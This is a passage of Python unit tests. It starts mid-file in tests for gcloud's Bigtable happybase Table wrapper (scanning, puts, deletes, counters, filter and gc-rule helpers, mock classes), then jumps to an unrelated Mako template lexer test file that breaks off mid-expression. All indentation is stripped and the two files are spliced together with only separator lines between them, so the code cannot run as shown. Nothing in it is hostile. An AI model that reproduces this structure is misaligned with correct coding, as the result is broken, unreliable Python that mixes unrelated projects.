with _Monkey(MUT, _WARN=mock_warn):
list(table.scan(batch_size=object(), unknown=None))
self.assertEqual(len(warned), 1)
self.assertIn('batch_size', warned[0])
def test_scan_with_scan_batching(self):
from gcloud._testing import _Monkey
from gcloud.bigtable.happybase import table as MUT
warned = []
def mock_warn(msg):
warned.append(msg)
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
# Use unknown to force a TypeError, so we don't need to
# stub out the rest of the method.
with self.assertRaises(TypeError):
with _Monkey(MUT, _WARN=mock_warn):
list(table.scan(scan_batching=object(), unknown=None))
self.assertEqual(len(warned), 1)
self.assertIn('scan_batching', warned[0])
def test_scan_with_sorted_columns(self):
from gcloud._testing import _Monkey
from gcloud.bigtable.happybase import table as MUT
warned = []
def mock_warn(msg):
warned.append(msg)
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
# Use unknown to force a TypeError, so we don't need to
# stub out the rest of the method.
with self.assertRaises(TypeError):
with _Monkey(MUT, _WARN=mock_warn):
list(table.scan(sorted_columns=object(), unknown=None))
self.assertEqual(len(warned), 1)
self.assertIn('sorted_columns', warned[0])
def test_scan_with_invalid_limit(self):
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
with self.assertRaises(ValueError):
list(table.scan(limit=-10))
def test_scan_with_row_prefix_and_row_start(self):
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
with self.assertRaises(ValueError):
list(table.scan(row_prefix='a', row_stop='abc'))
def test_scan_with_string_filter(self):
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
with self.assertRaises(TypeError):
list(table.scan(filter='some-string'))
def _scan_test_helper(self, row_limits=(None, None), row_prefix=None,
columns=None, filter_=None, timestamp=None,
include_timestamp=False, limit=None, rr_result=None,
expected_result=None):
import types
from gcloud._testing import _Monkey
from gcloud.bigtable.happybase import table as MUT
name = 'table-name'
row_start, row_stop = row_limits
connection = None
table = self._makeOne(name, connection)
table._low_level_table = _MockLowLevelTable()
rr_result = rr_result or _MockPartialRowsData()
table._low_level_table.read_rows_result = rr_result
self.assertEqual(rr_result.consume_next_calls, 0)
# Set-up mocks.
fake_col_filter = object()
mock_columns = []
def mock_columns_filter_helper(*args):
mock_columns.append(args)
return fake_col_filter
fake_filter = object()
mock_filters = []
def mock_filter_chain_helper(**kwargs):
mock_filters.append(kwargs)
return fake_filter
with _Monkey(MUT, _filter_chain_helper=mock_filter_chain_helper,
_columns_filter_helper=mock_columns_filter_helper):
result = table.scan(row_start=row_start, row_stop=row_stop,
row_prefix=row_prefix, columns=columns,
filter=filter_, timestamp=timestamp,
include_timestamp=include_timestamp,
limit=limit)
self.assertTrue(isinstance(result, types.GeneratorType))
# Need to consume the result while the monkey patch is applied.
# read_rows_result == Empty PartialRowsData --> No results.
expected_result = expected_result or []
self.assertEqual(list(result), expected_result)
read_rows_args = ()
if row_prefix:
row_start = row_prefix
row_stop = MUT._string_successor(row_prefix)
read_rows_kwargs = {
'end_key': row_stop,
'filter_': fake_filter,
'limit': limit,
'start_key': row_start,
}
self.assertEqual(table._low_level_table.read_rows_calls, [
(read_rows_args, read_rows_kwargs),
])
self.assertEqual(rr_result.consume_next_calls,
rr_result.iterations + 1)
if columns is not None:
self.assertEqual(mock_columns, [(columns,)])
else:
self.assertEqual(mock_columns, [])
filters = []
if filter_ is not None:
filters.append(filter_)
if columns:
filters.append(fake_col_filter)
expected_kwargs = {
'filters': filters,
'versions': 1,
'timestamp': timestamp,
}
self.assertEqual(mock_filters, [expected_kwargs])
def test_scan_with_columns(self):
columns = object()
self._scan_test_helper(columns=columns)
def test_scan_with_row_start_and_stop(self):
row_start = 'bar'
row_stop = 'foo'
row_limits = (row_start, row_stop)
self._scan_test_helper(row_limits=row_limits)
def test_scan_with_row_prefix(self):
row_prefix = 'row-prefi'
self._scan_test_helper(row_prefix=row_prefix)
def test_scan_with_filter(self):
mock_filter = object()
self._scan_test_helper(filter_=mock_filter)
def test_scan_with_no_results(self):
limit = 1337
timestamp = object()
self._scan_test_helper(timestamp=timestamp, limit=limit)
def test_scan_with_results(self):
from gcloud.bigtable.row_data import PartialRowData
row_key1 = 'row-key1'
row1 = PartialRowData(row_key1)
rr_result = _MockPartialRowsData(rows={row_key1: row1}, iterations=1)
include_timestamp = object()
expected_result = [(row_key1, {})]
self._scan_test_helper(include_timestamp=include_timestamp,
rr_result=rr_result,
expected_result=expected_result)
def test_put(self):
from gcloud._testing import _Monkey
from gcloud.bigtable.happybase import table as MUT
from gcloud.bigtable.happybase.table import _WAL_SENTINEL
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
batches_created = []
def make_batch(*args, **kwargs):
result = _MockBatch(*args, **kwargs)
batches_created.append(result)
return result
row = 'row-key'
data = {'fam:col': 'foo'}
timestamp = None
with _Monkey(MUT, Batch=make_batch):
result = table.put(row, data, timestamp=timestamp)
# There is no return value.
self.assertEqual(result, None)
# Check how the batch was created and used.
batch, = batches_created
self.assertTrue(isinstance(batch, _MockBatch))
self.assertEqual(batch.args, (table,))
expected_kwargs = {
'timestamp': timestamp,
'batch_size': None,
'transaction': False,
'wal': _WAL_SENTINEL,
}
self.assertEqual(batch.kwargs, expected_kwargs)
# Make sure it was a successful context manager
self.assertEqual(batch.exit_vals, [(None, None, None)])
self.assertEqual(batch.put_args, [(row, data)])
self.assertEqual(batch.delete_args, [])
def test_delete(self):
from gcloud._testing import _Monkey
from gcloud.bigtable.happybase import table as MUT
from gcloud.bigtable.happybase.table import _WAL_SENTINEL
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
batches_created = []
def make_batch(*args, **kwargs):
result = _MockBatch(*args, **kwargs)
batches_created.append(result)
return result
row = 'row-key'
columns = ['fam:col1', 'fam:col2']
timestamp = None
with _Monkey(MUT, Batch=make_batch):
result = table.delete(row, columns=columns, timestamp=timestamp)
# There is no return value.
self.assertEqual(result, None)
# Check how the batch was created and used.
batch, = batches_created
self.assertTrue(isinstance(batch, _MockBatch))
self.assertEqual(batch.args, (table,))
expected_kwargs = {
'timestamp': timestamp,
'batch_size': None,
'transaction': False,
'wal': _WAL_SENTINEL,
}
self.assertEqual(batch.kwargs, expected_kwargs)
# Make sure it was a successful context manager
self.assertEqual(batch.exit_vals, [(None, None, None)])
self.assertEqual(batch.put_args, [])
self.assertEqual(batch.delete_args, [(row, columns)])
def test_batch(self):
from gcloud._testing import _Monkey
from gcloud.bigtable.happybase import table as MUT
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
timestamp = object()
batch_size = 42
transaction = False # Must be False when batch_size is non-null
wal = object()
with _Monkey(MUT, Batch=_MockBatch):
result = table.batch(timestamp=timestamp, batch_size=batch_size,
transaction=transaction, wal=wal)
self.assertTrue(isinstance(result, _MockBatch))
self.assertEqual(result.args, (table,))
expected_kwargs = {
'timestamp': timestamp,
'batch_size': batch_size,
'transaction': transaction,
'wal': wal,
}
self.assertEqual(result.kwargs, expected_kwargs)
def test_counter_get(self):
klass = self._getTargetClass()
counter_value = 1337
class TableWithInc(klass):
incremented = []
value = counter_value
def counter_inc(self, row, column, value=1):
self.incremented.append((row, column, value))
self.value += value
return self.value
name = 'table-name'
connection = None
table = TableWithInc(name, connection)
row = 'row-key'
column = 'fam:col1'
self.assertEqual(TableWithInc.incremented, [])
result = table.counter_get(row, column)
self.assertEqual(result, counter_value)
self.assertEqual(TableWithInc.incremented, [(row, column, 0)])
def test_counter_dec(self):
klass = self._getTargetClass()
counter_value = 42
class TableWithInc(klass):
incremented = []
value = counter_value
def counter_inc(self, row, column, value=1):
self.incremented.append((row, column, value))
self.value += value
return self.value
name = 'table-name'
connection = None
table = TableWithInc(name, connection)
row = 'row-key'
column = 'fam:col1'
dec_value = 987
self.assertEqual(TableWithInc.incremented, [])
result = table.counter_dec(row, column, value=dec_value)
self.assertEqual(result, counter_value - dec_value)
self.assertEqual(TableWithInc.incremented, [(row, column, -dec_value)])
def _counter_inc_helper(self, row, column, value, commit_result):
import six
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
# Mock the return values.
table._low_level_table = _MockLowLevelTable()
table._low_level_table.row_values[row] = row_obj = _MockLowLevelRow(
row, commit_result=commit_result)
self.assertFalse(row_obj._append)
result = table.counter_inc(row, column, value=value)
self.assertTrue(row_obj._append)
incremented_value = value + _MockLowLevelRow.COUNTER_DEFAULT
self.assertEqual(result, incremented_value)
# Check the row values returned.
row_obj = table._low_level_table.row_values[row]
if isinstance(column, six.binary_type):
column = column.decode('utf-8')
self.assertEqual(row_obj.counts,
{tuple(column.split(':')): incremented_value})
def test_counter_set(self):
import struct
from gcloud._testing import _Monkey
from gcloud.bigtable.happybase import table as MUT
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
batches_created = []
def make_batch(*args, **kwargs):
result = _MockBatch(*args, **kwargs)
batches_created.append(result)
return result
row = 'row-key'
column = 'fam:col1'
value = 42
with _Monkey(MUT, Batch=make_batch):
result = table.counter_set(row, column, value=value)
# There is no return value.
self.assertEqual(result, None)
# Check how the batch was created and used.
batch, = batches_created
self.assertTrue(isinstance(batch, _MockBatch))
self.assertEqual(batch.args, (table,))
expected_kwargs = {
'timestamp': None,
'batch_size': None,
'transaction': False,
'wal': MUT._WAL_SENTINEL,
}
self.assertEqual(batch.kwargs, expected_kwargs)
# Make sure it was a successful context manager
self.assertEqual(batch.exit_vals, [(None, None, None)])
data = {column: struct.Struct('>q').pack(value)}
self.assertEqual(batch.put_args, [(row, data)])
self.assertEqual(batch.delete_args, [])
def test_counter_inc(self):
import struct
row = 'row-key'
col_fam = u'fam'
col_qual = u'col1'
column = col_fam + u':' + col_qual
value = 42
packed_value = struct.pack('>q', value)
fake_timestamp = None
commit_result = {
col_fam: {
col_qual: [(packed_value, fake_timestamp)],
}
}
self._counter_inc_helper(row, column, value, commit_result)
def test_counter_inc_column_bytes(self):
import struct
row = 'row-key'
col_fam = b'fam'
col_qual = b'col1'
column = col_fam + b':' + col_qual
value = 42
packed_value = struct.pack('>q', value)
fake_timestamp = None
commit_result = {
col_fam.decode('utf-8'): {
col_qual.decode('utf-8'): [(packed_value, fake_timestamp)],
}
}
self._counter_inc_helper(row, column, value, commit_result)
def test_counter_inc_bad_result(self):
row = 'row-key'
col_fam = 'fam'
col_qual = 'col1'
column = col_fam + ':' + col_qual
value = 42
commit_result = None
with self.assertRaises(TypeError):
self._counter_inc_helper(row, column, value, commit_result)
def test_counter_inc_result_key_error(self):
row = 'row-key'
col_fam = 'fam'
col_qual = 'col1'
column = col_fam + ':' + col_qual
value = 42
commit_result = {}
with self.assertRaises(KeyError):
self._counter_inc_helper(row, column, value, commit_result)
def test_counter_inc_result_nested_key_error(self):
row = 'row-key'
col_fam = 'fam'
col_qual = 'col1'
column = col_fam + ':' + col_qual
value = 42
commit_result = {col_fam: {}}
with self.assertRaises(KeyError):
self._counter_inc_helper(row, column, value, commit_result)
def test_counter_inc_result_non_unique_cell(self):
row = 'row-key'
col_fam = 'fam'
col_qual = 'col1'
column = col_fam + ':' + col_qual
value = 42
fake_timestamp = None
packed_value = None
commit_result = {
col_fam: {
col_qual: [
(packed_value, fake_timestamp),
(packed_value, fake_timestamp),
],
}
}
with self.assertRaises(ValueError):
self._counter_inc_helper(row, column, value, commit_result)
class Test__gc_rule_to_dict(unittest2.TestCase):
def _callFUT(self, *args, **kwargs):
from gcloud.bigtable.happybase.table import _gc_rule_to_dict
return _gc_rule_to_dict(*args, **kwargs)
def test_with_null(self):
gc_rule = None
result = self._callFUT(gc_rule)
self.assertEqual(result, {})
def test_with_max_versions(self):
from gcloud.bigtable.column_family import MaxVersionsGCRule
max_versions = 2
gc_rule = MaxVersionsGCRule(max_versions)
result = self._callFUT(gc_rule)
expected_result = {'max_versions': max_versions}
self.assertEqual(result, expected_result)
def test_with_max_age(self):
import datetime
from gcloud.bigtable.column_family import MaxAgeGCRule
time_to_live = 101
max_age = datetime.timedelta(seconds=time_to_live)
gc_rule = MaxAgeGCRule(max_age)
result = self._callFUT(gc_rule)
expected_result = {'time_to_live': time_to_live}
self.assertEqual(result, expected_result)
def test_with_non_gc_rule(self):
gc_rule = object()
result = self._callFUT(gc_rule)
self.assertTrue(result is gc_rule)
def test_with_gc_rule_union(self):
from gcloud.bigtable.column_family import GCRuleUnion
gc_rule = GCRuleUnion(rules=[])
result = self._callFUT(gc_rule)
self.assertTrue(result is gc_rule)
def test_with_intersection_other_than_two(self):
from gcloud.bigtable.column_family import GCRuleIntersection
gc_rule = GCRuleIntersection(rules=[])
result = self._callFUT(gc_rule)
self.assertTrue(result is gc_rule)
def test_with_intersection_two_max_num_versions(self):
from gcloud.bigtable.column_family import GCRuleIntersection
from gcloud.bigtable.column_family import MaxVersionsGCRule
rule1 = MaxVersionsGCRule(1)
rule2 = MaxVersionsGCRule(2)
gc_rule = GCRuleIntersection(rules=[rule1, rule2])
result = self._callFUT(gc_rule)
self.assertTrue(result is gc_rule)
def test_with_intersection_two_rules(self):
import datetime
from gcloud.bigtable.column_family import GCRuleIntersection
from gcloud.bigtable.column_family import MaxAgeGCRule
from gcloud.bigtable.column_family import MaxVersionsGCRule
time_to_live = 101
max_age = datetime.timedelta(seconds=time_to_live)
rule1 = MaxAgeGCRule(max_age)
max_versions = 2
rule2 = MaxVersionsGCRule(max_versions)
gc_rule = GCRuleIntersection(rules=[rule1, rule2])
result = self._callFUT(gc_rule)
expected_result = {
'max_versions': max_versions,
'time_to_live': time_to_live,
}
self.assertEqual(result, expected_result)
def test_with_intersection_two_nested_rules(self):
from gcloud.bigtable.column_family import GCRuleIntersection
rule1 = GCRuleIntersection(rules=[])
rule2 = GCRuleIntersection(rules=[])
gc_rule = GCRuleIntersection(rules=[rule1, rule2])
result = self._callFUT(gc_rule)
self.assertTrue(result is gc_rule)
class Test__string_successor(unittest2.TestCase):
def _callFUT(self, *args, **kwargs):
from gcloud.bigtable.happybase.table import _string_successor
return _string_successor(*args, **kwargs)
def test_with_alphanumeric(self):
self.assertEqual(self._callFUT(b'boa'), b'bob')
self.assertEqual(self._callFUT(b'abc1'), b'abc2')
def test_with_last_byte(self):
self.assertEqual(self._callFUT(b'boa\xff'), b'bob')
def test_with_empty_string(self):
self.assertEqual(self._callFUT(b''), b'')
def test_with_all_last_bytes(self):
self.assertEqual(self._callFUT(b'\xff\xff\xff'), b'')
def test_with_unicode_input(self):
self.assertEqual(self._callFUT(u'boa'), b'bob')
class Test__convert_to_time_range(unittest2.TestCase):
def _callFUT(self, timestamp=None):
from gcloud.bigtable.happybase.table import _convert_to_time_range
return _convert_to_time_range(timestamp=timestamp)
def test_null(self):
timestamp = None
result = self._callFUT(timestamp=timestamp)
self.assertEqual(result, None)
def test_invalid_type(self):
timestamp = object()
with self.assertRaises(TypeError):
self._callFUT(timestamp=timestamp)
def test_success(self):
from gcloud._helpers import _datetime_from_microseconds
from gcloud.bigtable.row_filters import TimestampRange
timestamp = 1441928298571
ts_dt = _datetime_from_microseconds(1000 * timestamp)
result = self._callFUT(timestamp=timestamp)
self.assertTrue(isinstance(result, TimestampRange))
self.assertEqual(result.start, None)
self.assertEqual(result.end, ts_dt)
class Test__cells_to_pairs(unittest2.TestCase):
def _callFUT(self, *args, **kwargs):
from gcloud.bigtable.happybase.table import _cells_to_pairs
return _cells_to_pairs(*args, **kwargs)
def test_without_timestamp(self):
from gcloud.bigtable.row_data import Cell
value1 = 'foo'
cell1 = Cell(value=value1, timestamp=None)
value2 = 'bar'
cell2 = Cell(value=value2, timestamp=None)
result = self._callFUT([cell1, cell2])
self.assertEqual(result, [value1, value2])
def test_with_timestamp(self):
from gcloud._helpers import _datetime_from_microseconds
from gcloud.bigtable.row_data import Cell
value1 = 'foo'
ts1_millis = 1221934570148
ts1 = _datetime_from_microseconds(ts1_millis * 1000)
cell1 = Cell(value=value1, timestamp=ts1)
value2 = 'bar'
ts2_millis = 1221955575548
ts2 = _datetime_from_microseconds(ts2_millis * 1000)
cell2 = Cell(value=value2, timestamp=ts2)
result = self._callFUT([cell1, cell2], include_timestamp=True)
self.assertEqual(result,
[(value1, ts1_millis), (value2, ts2_millis)])
class Test__partial_row_to_dict(unittest2.TestCase):
def _callFUT(self, partial_row_data, include_timestamp=False):
from gcloud.bigtable.happybase.table import _partial_row_to_dict
return _partial_row_to_dict(partial_row_data,
include_timestamp=include_timestamp)
def test_without_timestamp(self):
from gcloud.bigtable.row_data import Cell
from gcloud.bigtable.row_data import PartialRowData
row_data = PartialRowData(b'row-key')
val1 = b'hi-im-bytes'
val2 = b'bi-im-hytes'
row_data._cells[u'fam1'] = {
b'col1': [Cell(val1, None)],
b'col2': [Cell(val2, None)],
}
result = self._callFUT(row_data)
expected_result = {
b'fam1:col1': val1,
b'fam1:col2': val2,
}
self.assertEqual(result, expected_result)
def test_with_timestamp(self):
from gcloud._helpers import _datetime_from_microseconds
from gcloud.bigtable.row_data import Cell
from gcloud.bigtable.row_data import PartialRowData
row_data = PartialRowData(b'row-key')
val1 = b'hi-im-bytes'
ts1_millis = 1221934570148
ts1 = _datetime_from_microseconds(ts1_millis * 1000)
val2 = b'bi-im-hytes'
ts2_millis = 1331934880000
ts2 = _datetime_from_microseconds(ts2_millis * 1000)
row_data._cells[u'fam1'] = {
b'col1': [Cell(val1, ts1)],
b'col2': [Cell(val2, ts2)],
}
result = self._callFUT(row_data, include_timestamp=True)
expected_result = {
b'fam1:col1': (val1, ts1_millis),
b'fam1:col2': (val2, ts2_millis),
}
self.assertEqual(result, expected_result)
class Test__filter_chain_helper(unittest2.TestCase):
def _callFUT(self, *args, **kwargs):
from gcloud.bigtable.happybase.table import _filter_chain_helper
return _filter_chain_helper(*args, **kwargs)
def test_no_filters(self):
with self.assertRaises(ValueError):
self._callFUT()
def test_single_filter(self):
from gcloud.bigtable.row_filters import CellsColumnLimitFilter
versions = 1337
result = self._callFUT(versions=versions)
self.assertTrue(isinstance(result, CellsColumnLimitFilter))
# Relies on the fact that RowFilter instances can
# only have one value set.
self.assertEqual(result.num_cells, versions)
def test_existing_filters(self):
from gcloud.bigtable.row_filters import CellsColumnLimitFilter
filters = []
versions = 1337
result = self._callFUT(versions=versions, filters=filters)
# Make sure filters has grown.
self.assertEqual(filters, [result])
self.assertTrue(isinstance(result, CellsColumnLimitFilter))
# Relies on the fact that RowFilter instances can
# only have one value set.
self.assertEqual(result.num_cells, versions)
def _column_helper(self, num_filters, versions=None, timestamp=None,
column=None, col_fam=None, qual=None):
from gcloud.bigtable.row_filters import ColumnQualifierRegexFilter
from gcloud.bigtable.row_filters import FamilyNameRegexFilter
from gcloud.bigtable.row_filters import RowFilterChain
if col_fam is None:
col_fam = 'cf1'
if qual is None:
qual = 'qual'
if column is None:
column = col_fam + ':' + qual
result = self._callFUT(column, versions=versions, timestamp=timestamp)
self.assertTrue(isinstance(result, RowFilterChain))
self.assertEqual(len(result.filters), num_filters)
fam_filter = result.filters[0]
qual_filter = result.filters[1]
self.assertTrue(isinstance(fam_filter, FamilyNameRegexFilter))
self.assertTrue(isinstance(qual_filter, ColumnQualifierRegexFilter))
# Relies on the fact that RowFilter instances can
# only have one value set.
self.assertEqual(fam_filter.regex, col_fam.encode('utf-8'))
self.assertEqual(qual_filter.regex, qual.encode('utf-8'))
return result
def test_column_only(self):
self._column_helper(num_filters=2)
def test_column_bytes(self):
self._column_helper(num_filters=2, column=b'cfB:qualY',
col_fam=u'cfB', qual=u'qualY')
def test_column_unicode(self):
self._column_helper(num_filters=2, column=u'cfU:qualN',
col_fam=u'cfU', qual=u'qualN')
def test_with_versions(self):
from gcloud.bigtable.row_filters import CellsColumnLimitFilter
versions = 11
result = self._column_helper(num_filters=3, versions=versions)
version_filter = result.filters[2]
self.assertTrue(isinstance(version_filter, CellsColumnLimitFilter))
# Relies on the fact that RowFilter instances can
# only have one value set.
self.assertEqual(version_filter.num_cells, versions)
def test_with_timestamp(self):
from gcloud._helpers import _datetime_from_microseconds
from gcloud.bigtable.row_filters import TimestampRange
from gcloud.bigtable.row_filters import TimestampRangeFilter
timestamp = 1441928298571
result = self._column_helper(num_filters=3, timestamp=timestamp)
range_filter = result.filters[2]
self.assertTrue(isinstance(range_filter, TimestampRangeFilter))
# Relies on the fact that RowFilter instances can
# only have one value set.
time_range = range_filter.range_
self.assertTrue(isinstance(time_range, TimestampRange))
self.assertEqual(time_range.start, None)
ts_dt = _datetime_from_microseconds(1000 * timestamp)
self.assertEqual(time_range.end, ts_dt)
def test_with_all_options(self):
versions = 11
timestamp = 1441928298571
self._column_helper(num_filters=4, versions=versions,
timestamp=timestamp)
class Test__columns_filter_helper(unittest2.TestCase):
def _callFUT(self, *args, **kwargs):
from gcloud.bigtable.happybase.table import _columns_filter_helper
return _columns_filter_helper(*args, **kwargs)
def test_no_columns(self):
columns = []
with self.assertRaises(ValueError):
self._callFUT(columns)
def test_single_column(self):
from gcloud.bigtable.row_filters import FamilyNameRegexFilter
col_fam = 'cf1'
columns = [col_fam]
result = self._callFUT(columns)
expected_result = FamilyNameRegexFilter(col_fam)
self.assertEqual(result, expected_result)
def test_column_and_column_families(self):
from gcloud.bigtable.row_filters import ColumnQualifierRegexFilter
from gcloud.bigtable.row_filters import FamilyNameRegexFilter
from gcloud.bigtable.row_filters import RowFilterChain
from gcloud.bigtable.row_filters import RowFilterUnion
col_fam1 = 'cf1'
col_fam2 = 'cf2'
col_qual2 = 'qual2'
columns = [col_fam1, col_fam2 + ':' + col_qual2]
result = self._callFUT(columns)
self.assertTrue(isinstance(result, RowFilterUnion))
self.assertEqual(len(result.filters), 2)
filter1 = result.filters[0]
filter2 = result.filters[1]
self.assertTrue(isinstance(filter1, FamilyNameRegexFilter))
self.assertEqual(filter1.regex, col_fam1.encode('utf-8'))
self.assertTrue(isinstance(filter2, RowFilterChain))
filter2a, filter2b = filter2.filters
self.assertTrue(isinstance(filter2a, FamilyNameRegexFilter))
self.assertEqual(filter2a.regex, col_fam2.encode('utf-8'))
self.assertTrue(isinstance(filter2b, ColumnQualifierRegexFilter))
self.assertEqual(filter2b.regex, col_qual2.encode('utf-8'))
class Test__row_keys_filter_helper(unittest2.TestCase):
def _callFUT(self, *args, **kwargs):
from gcloud.bigtable.happybase.table import _row_keys_filter_helper
return _row_keys_filter_helper(*args, **kwargs)
def test_no_rows(self):
row_keys = []
with self.assertRaises(ValueError):
self._callFUT(row_keys)
def test_single_row(self):
from gcloud.bigtable.row_filters import RowKeyRegexFilter
row_key = b'row-key'
row_keys = [row_key]
result = self._callFUT(row_keys)
expected_result = RowKeyRegexFilter(row_key)
self.assertEqual(result, expected_result)
def test_many_rows(self):
from gcloud.bigtable.row_filters import RowFilterUnion
from gcloud.bigtable.row_filters import RowKeyRegexFilter
row_key1 = b'row-key1'
row_key2 = b'row-key2'
row_key3 = b'row-key3'
row_keys = [row_key1, row_key2, row_key3]
result = self._callFUT(row_keys)
filter1 = RowKeyRegexFilter(row_key1)
filter2 = RowKeyRegexFilter(row_key2)
filter3 = RowKeyRegexFilter(row_key3)
expected_result = RowFilterUnion(filters=[filter1, filter2, filter3])
self.assertEqual(result, expected_result)
class _Connection(object):
def __init__(self, instance):
self._instance = instance
class _MockLowLevelColumnFamily(object):
def __init__(self, column_family_id, gc_rule=None):
self.column_family_id = column_family_id
self.gc_rule = gc_rule
class _MockLowLevelTable(object):
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
self.list_column_families_calls = 0
self.column_families = {}
self.row_values = {}
self.read_row_calls = []
self.read_row_result = None
self.read_rows_calls = []
self.read_rows_result = None
def list_column_families(self):
self.list_column_families_calls += 1
return self.column_families
def row(self, row_key, append=None):
result = self.row_values[row_key]
result._append = append
return result
def read_row(self, *args, **kwargs):
self.read_row_calls.append((args, kwargs))
return self.read_row_result
def read_rows(self, *args, **kwargs):
self.read_rows_calls.append((args, kwargs))
return self.read_rows_result
class _MockLowLevelRow(object):
COUNTER_DEFAULT = 0
def __init__(self, row_key, commit_result=None):
self.row_key = row_key
self._append = False
self.counts = {}
self.commit_result = commit_result
def increment_cell_value(self, column_family_id, column, int_value):
count = self.counts.setdefault((column_family_id, column),
self.COUNTER_DEFAULT)
self.counts[(column_family_id, column)] = count + int_value
def commit(self):
return self.commit_result
class _MockBatch(object):
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
self.exit_vals = []
self.put_args = []
self.delete_args = []
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.exit_vals.append((exc_type, exc_value, traceback))
def put(self, *args):
self.put_args.append(args)
def delete(self, *args):
self.delete_args.append(args)
class _MockPartialRowsData(object):
def __init__(self, rows=None, iterations=0):
self.rows = rows or {}
self.consume_all_calls = 0
self.consume_next_calls = 0
self.iterations = iterations
def consume_all(self):
self.consume_all_calls += 1
def consume_next(self):
self.consume_next_calls += 1
if self.consume_next_calls > self.iterations:
raise StopIteration
|
|
from mako.lexer import Lexer
from mako import exceptions, util, compat
from test.util import flatten_result
from mako.template import Template
import re
from test import TemplateTest, eq_, assert_raises_message
# create fake parsetree classes which are constructed
# exactly as the repr() of a real parsetree object.
# this allows us to use a Python construct as the source
# of a comparable repr(), which is also hit by the 2to3 tool.
def repr_arg(x):
if isinstance(x, dict):
return util.sorted_dict_repr(x)
else:
return repr(x)
def _as_unicode(arg):
if isinstance(arg, compat.string_types):
return compat.text_type(arg)
elif isinstance(arg, dict):
return dict(
(_as_unicode(k), _as_unicode(v))
for k, v in arg.items()
)
else:
return arg
from mako import parsetree
for cls in list(parsetree.__dict__.values()):
if isinstance(cls, type) and \
issubclass(cls, parsetree.Node):
clsname = cls.__name__
exec(("""
class %s(object):
def __init__(self, *args):
self.args = [_as_unicode(arg) for arg in args]
def __repr__(self):
return "%%s(%%s)" %% (
self.__class__.__name__,
", ".join(repr_arg(x) for x in self.args)
)
""" % clsname), locals())
# NOTE: most assertion expressions were generated, then formatted
# by PyTidy, hence the dense formatting.
class LexerTest(TemplateTest):
def _compare(self, node, expected):
eq_(repr(node), repr(expected))
def test_text_and_tag(self):
template = """
<b>Hello world</b>
<%def name="foo()">
this is a def.
</%def>
and some more text.
"""
node = Lexer(template).parse()
self._compare(node, TemplateNode({},
[Text('''\n<b>Hello world</b>\n ''', (1,
1)), DefTag('def', {'name': 'foo()'}, (3, 9),
[Text('''\n this is a def.\n ''',
(3, 28))]),
Text('''\n\n and some more text.\n''',
(5, 16))]))
def test_unclosed_tag(self):
template = """
<%def name="foo()">
other text
"""
try:
nodes = Lexer(template).parse()
assert False
except exceptions.SyntaxException:
eq_(
str(compat.exception_as()),
"Unclosed tag: <%def> at line: 5 char: 9"
)
def test_onlyclosed_tag(self):
template = \
"""
<%def name="foo()">
foo
</%def>
</%namespace>
hi.
"""
self.assertRaises(exceptions.SyntaxException,
Lexer(template).parse)
def test_noexpr_allowed(self):
template = \
"""
<%namespace name="${foo}"/>
"""
self.assertRaises(exceptions.CompileException,
Lexer(template).parse)
def test_unmatched_tag(self):
template = \
"""
<%namespace name="bar">
<%def name="foo()">
foo
</%namespace>
</%def>
hi.
"""
self.assertRaises(exceptions.SyntaxException,
Lexer(template).parse)
def test_nonexistent_tag(self):
template = """
<%lala x="5"/>
"""
self.assertRaises(exceptions.CompileException,
Lexer(template).parse)
def test_wrongcase_tag(self):
template = \
"""
<%DEF name="foo()">
</%def>
"""
self.assertRaises(exceptions.CompileException,
Lexer(template).parse)
def test_percent_escape(self):
template = \
"""
%% some whatever.
%% more some whatever
% if foo:
% endif
"""
node = Lexer(template).parse()
self._compare(node, TemplateNode({}, [Text('''\n\n''',
(1, 1)), Text('''% some whatever.\n\n''', (3, 2)),
Text(' %% more some whatever\n', (5, 2)),
ControlLine('if', 'if foo:', False, (6, 1)),
ControlLine('if', 'endif', True, (7, 1)),
Text(' ', (8, 1))]))
def test_old_multiline_comment(self):
template = """#*"""
node = Lexer(template).parse()
self._compare(node, TemplateNode({}, [Text('''#*''', (1, 1))]))
def test_text_tag(self):
template = \
"""
## comment
% if foo:
hi
% endif
<%text>
# more code
% more code
<%illegal compionent>/></>
<%def name="laal()">def</%def>
</%text>
<%def name="foo()">this is foo</%def>
% if bar:
code
% endif
"""
node = Lexer(template).parse()
self._compare(node,
TemplateNode({}, [Text('\n', (1, 1)),
Comment('comment', (2, 1)),
ControlLine('if', 'if foo:', False, (3, 1)),
Text(' hi\n', (4, 1)),
ControlLine('if', 'endif', True, (5, 1)),
Text(' ', (6, 1)),
TextTag('text', {}, (6, 9),
[Text('\n # more code\n\n '
' % more code\n <%illegal compionent>/></>\n'
' <%def name="laal()">def</%def>\n\n\n ',
(6, 16))]), Text('\n\n ', (14, 17)),
DefTag('def', {'name': 'foo()'}, (16, 9),
[Text('this is foo', (16, 28))]), Text('\n\n', (16, 46)),
ControlLine('if', 'if bar:', False, (18, 1)),
Text(' code\n', (19, 1)),
ControlLine('if', 'endif', True, (20, 1)),
Text(' ', (21, 1))])
)
def test_def_syntax(self):
template = \
"""
<%def lala>
hi
</%def>
"""
self.assertRaises(exceptions.CompileException,
Lexer(template).parse)
def test_def_syntax_2(self):
template = \
"""
<%def name="lala">
hi
</%def>
"""
self.assertRaises(exceptions.CompileException,
Lexer(template).parse)
def test_whitespace_equals(self):
template = \
"""
<%def name = "adef()" >
adef
</%def>
"""
node = Lexer(template).parse()
self._compare(node, TemplateNode({}, [Text('\n ',
(1, 1)), DefTag('def', {'name': 'adef()'}, (2,
13),
[Text('''\n adef\n ''',
(2, 36))]), Text('\n ', (4, 20))]))
def test_ns_tag_closed(self):
template = \
"""
<%self:go x="1" y="2" z="${'hi' + ' ' + 'there'}"/>
"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({},
[Text('''
''', (1, 1)),
CallNamespaceTag('self:go', {'x': '1', 'y'
: '2', 'z': "${'hi' + ' ' + 'there'}"}, (3,
